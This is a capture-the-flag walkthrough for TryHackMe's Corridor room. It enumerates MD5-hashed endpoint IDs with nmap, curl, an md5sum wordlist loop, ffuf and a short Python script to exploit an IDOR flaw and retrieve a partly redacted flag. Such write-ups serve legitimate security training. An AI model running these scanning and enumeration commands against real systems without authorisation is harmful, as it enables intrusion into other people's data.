Corridor Writeup – TryHackMe IDOR Challenge



This post provides a full walkthrough of the Corridor challenge on TryHackMe. We find the flag by exploiting an IDOR (Insecure Direct Object Reference) vulnerability: the object ID in the web app's URL is only obfuscated by an MD5 hash, not protected by any access control.



Introduction – Corridor

The challenge description is very explicit:

In this challenge, you will explore potential IDOR vulnerabilities. Examine the URL endpoints you access as you navigate the website and note the hexadecimal values you find (they look an awful lot like a hash, don't they?). This could help you uncover website locations you were not expected to access.

So there must be something to do with an IDOR vulnerability and hash values…

Let’s solve this, shall we?


Recon

Discovering the Corridor web app

After a simple nmap TCP scan, we only detect a web app running on the target:

nmap -sS -sV -p- -Pn --disable-arp-ping -T5 10.80.164.180
[...]
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Werkzeug httpd 2.0.3 (Python 3.10.2)

nmap options:

  • -sS: TCP SYN ("half-open") scan
  • -sV: probes the open ports to identify each service and its version
  • -p-: scans all 65,535 TCP ports
  • -Pn and --disable-arp-ping: skip host discovery (the ICMP/ARP ping nmap sends by default) and scan the target directly
  • -T5: the most aggressive timing template, which among other things caps the scan delay at 5 ms per probe

With a simple curl request, we can inspect the source code of the index page of this web app:

curl -skLi 10.80.164.180
[...]
<img src="/static/img/corridor.png" usemap="#image-map">

    <map name="image-map">
        <area target="" alt="c4ca4238a0b923820dcc509a6f75849b" title="c4ca4238a0b923820dcc509a6f75849b" href="c4ca4238a0b923820dcc509a6f75849b" coords="257,893,258,332,325,351,325,860" shape="poly">
[...]
        <area target="" alt="c51ce410c124a10e0db5e4b97fc2af39" title="c51ce410c124a10e0db5e4b97fc2af39" href="c51ce410c124a10e0db5e4b97fc2af39" coords="1073,609,1081,620,1082,459,1073,463" shape="poly">
    </map>

curl options:

  • -s: silent mode (no progress meter)
  • -k: accepts insecure TLS connections (skips certificate verification)
  • -L: follows redirections
  • -i: includes the HTTP response headers in the output

Mmhh…

The alt, title and href attributes of the <area> HTML tags are suspicious…


Understanding the potential IDOR

They have the exact format of MD5 hashes: 32 hexadecimal characters.

A quick search online shows that they are the MD5 hashes of the numbers 1, 2, 3, and so on. Quick check with the Linux md5sum command:

echo -n 1 | md5sum
c4ca4238a0b923820dcc509a6f75849b  -

echo -n 13 | md5sum
c51ce410c124a10e0db5e4b97fc2af39  -

Yeah, we have the same values that were found in the source code.

Appending any of those MD5 hashes to the URL gives us an HTTP 200 OK response:

curl -skLi 10.80.164.180/c51ce410c124a10e0db5e4b97fc2af39
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 632
Server: Werkzeug/2.0.3 Python/3.10.2
Date: Tue, 03 Feb 2026 15:13:48 GMT
[...]

So these hashes are used by the server to return content, and we know how they are calculated (simple MD5 hashes of consecutive numbers).

What if we could try other endpoints, beyond the number 13?

What if the MD5 hash of number 20 returns a “hidden” response?


Exploiting the IDOR to get the Flag

With this knowledge, we know our task: enumerate the endpoints using the consecutive MD5 hashes of many numbers.

We’ll go from 0 to 10,000.

To do so, we must create the wordlist containing the MD5 hashes of those 10,001 numbers.

Here is the command I came up with:

for i in $(seq 0 10000); do echo -n $i | md5sum | awk '{print $1}'; done > /tmp/md5fuzz

It uses seq to generate numbers from 0 to 10,000 then a combination of md5sum and awk to compute and extract the MD5 hash of each number. The output is redirected into the /tmp/md5fuzz file.

Now, let’s try each of those MD5 hashes as endpoints with ffuf:

ffuf -w /tmp/md5fuzz -u "http://10.80.164.180/FUZZ" -mc all -fc 404
[...]
e4da3b7fbbce2345d7772b0674a318d5 [Status: 200, Size: 632, Words: 72, Lines: 24]
6512bd43d9caa6e02c990b0a82652dca [Status: 200, Size: 632, Words: 72, Lines: 24]
c20ad4d76fe97759aa27a0c99bff6710 [Status: 200, Size: 632, Words: 72, Lines: 24]
c81e728d9d4c2f636f067f89cc14862c [Status: 200, Size: 632, Words: 72, Lines: 24]
1679091c5a880faf6fb5e6087eb1b2dc [Status: 200, Size: 632, Words: 72, Lines: 24]
8f14e45fceea167a5a36dedd4bea2543 [Status: 200, Size: 632, Words: 72, Lines: 24]
a87ff679a2f3e71d9181a67b7542122c [Status: 200, Size: 632, Words: 72, Lines: 24]
c51ce410c124a10e0db5e4b97fc2af39 [Status: 200, Size: 632, Words: 72, Lines: 24]
eccbc87e4b5ce2fe28308fd9f2a7baf3 [Status: 200, Size: 632, Words: 72, Lines: 24]
cfcd208495d565ef66e7dff9f98764da [Status: 200, Size: 797, Words: 121, Lines: 34]
c9f0f895fb98ab9159f51fd0297e236d [Status: 200, Size: 632, Words: 72, Lines: 24]
45c48cce2e2d7fbdea1afc51c7c6ad26 [Status: 200, Size: 632, Words: 72, Lines: 24]
d3d9446802a44259755d38e6d163e820 [Status: 200, Size: 632, Words: 72, Lines: 24]
c4ca4238a0b923820dcc509a6f75849b [Status: 200, Size: 632, Words: 72, Lines: 24]

ffuf options:

  • -w: wordlist
  • -u: target URL
  • -mc all -fc 404: matches every response code, then filters out the 404 Not Found responses

In total, we have 14 valid MD5 hashes.

Notice that one of them returns a response of 797 bytes, while all the others are 632 bytes.
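To make the weakness concrete, here is an added Python example (not part of the original writeup or of the challenge) that does offline what the seq/md5sum loop and the ffuf run do: it builds the hash-to-number table and resolves the 14 ffuf hits above back to their numeric IDs, exposing the one endpoint (ID 0) that the image map never linked. The hash list is copied from the ffuf output above; the range limit and the set of linked IDs (1 to 13, as seen in the index page) are assumptions taken from the writeup.

```python
import hashlib

# The 14 hashes ffuf reported with status 200 (copied from the writeup's output).
FFUF_HITS = [
    "e4da3b7fbbce2345d7772b0674a318d5", "6512bd43d9caa6e02c990b0a82652dca",
    "c20ad4d76fe97759aa27a0c99bff6710", "c81e728d9d4c2f636f067f89cc14862c",
    "1679091c5a880faf6fb5e6087eb1b2dc", "8f14e45fceea167a5a36dedd4bea2543",
    "a87ff679a2f3e71d9181a67b7542122c", "c51ce410c124a10e0db5e4b97fc2af39",
    "eccbc87e4b5ce2fe28308fd9f2a7baf3", "cfcd208495d565ef66e7dff9f98764da",
    "c9f0f895fb98ab9159f51fd0297e236d", "45c48cce2e2d7fbdea1afc51c7c6ad26",
    "d3d9446802a44259755d38e6d163e820", "c4ca4238a0b923820dcc509a6f75849b",
]

# IDs that the index page's <map> actually links to (assumption: 1..13).
LINKED_IDS = set(range(1, 14))


def md5_hex(n: int) -> str:
    """Same value as `echo -n N | md5sum`: MD5 of the decimal string, no newline."""
    return hashlib.md5(str(n).encode()).hexdigest()


def build_id_table(limit: int = 10000) -> dict[str, int]:
    """Python equivalent of the seq/md5sum/awk loop: hash -> original number.
    A predictable, unkeyed hash of a small counter is trivially invertible this way,
    which is why md5(id) adds no protection over a plain numeric id."""
    return {md5_hex(i): i for i in range(limit + 1)}


def resolve_ids(hits: list[str], table: dict[str, int]) -> dict[str, int]:
    """Map each hash ffuf found back to its number; unknown hashes are skipped."""
    return {h: table[h] for h in hits if h in table}


def unlinked_ids(resolved: dict[str, int], linked: set[int] = LINKED_IDS) -> list[int]:
    """IDs reachable on the server but never linked from the UI: the IDOR targets."""
    return sorted(n for n in resolved.values() if n not in linked)


if __name__ == "__main__":
    table = build_id_table()
    resolved = resolve_ids(FFUF_HITS, table)
    for h, n in sorted(resolved.items(), key=lambda kv: kv[1]):
        print(f"{h} -> {n}")
    print("not linked from the image map:", unlinked_ids(resolved))  # [0]
```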

Let’s get this endpoint:

curl -skLi 10.80.164.180/cfcd208495d565ef66e7dff9f98764da

<h1>
    flag{2477ef0**************************}
</h1>

Yeah, that’s the flag!


Final Thoughts on Corridor from TryHackMe

Corridor is an easy IDOR challenge, but it still required a bit of thinking: it wasn't a blatant IDOR with a URL like "/?id=1".

I hope you enjoyed this walkthrough! Flags are hidden so you have to do it and learn by yourself 🙂


Disclaimer

This article is provided for educational purposes only.

All techniques demonstrated were performed in a controlled lab environment.

Do not attempt to reproduce these actions on systems you do not own or have explicit authorization to test.

I do not encourage or take responsibility for any illegal use of the information provided.
